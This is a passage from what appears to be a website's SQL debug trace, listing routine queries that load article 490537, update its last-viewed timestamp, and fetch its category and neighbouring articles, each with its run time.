  6. SELECT * FROM `set` [ RunTime:0.004609s ]
  7. SHOW FULL COLUMNS FROM `article` [ RunTime:0.001984s ]
  8. SELECT * FROM `article` WHERE `id` = 490537 LIMIT 1 [ RunTime:0.010693s ]
  9. UPDATE `article` SET `lasttime` = 1783090651 WHERE `id` = 490537 [ RunTime:0.078672s ]
  10. SELECT * FROM `fenlei` WHERE `id` = 67 LIMIT 1 [ RunTime:0.003303s ]
  11. SELECT * FROM `article` WHERE `id` < 490537 ORDER BY `id` DESC LIMIT 1 [ RunTime:0.002446s ]
  12. SELECT * FROM `article` WHERE `id` > 490537 ORDER BY `id` ASC LIMIT 1 [ RunTime:0.016917s ]
  13. SELECT * FROM `article` WHERE `id` < 490537 ORDER BY `id` DESC LIMIT 10 [ RunTime:0.007091s ]
  14. SELECT * FROM `article` WHERE `id` < 490537 ORDER BY `id` DESC LIMIT 10,10 [ RunTime:0.047490s ]
  15. SELECT * FROM `article` WHERE `id` < 490537 ORDER BY `id` DESC LIMIT 20,10 [ RunTime:0.030511s ]
0.459812s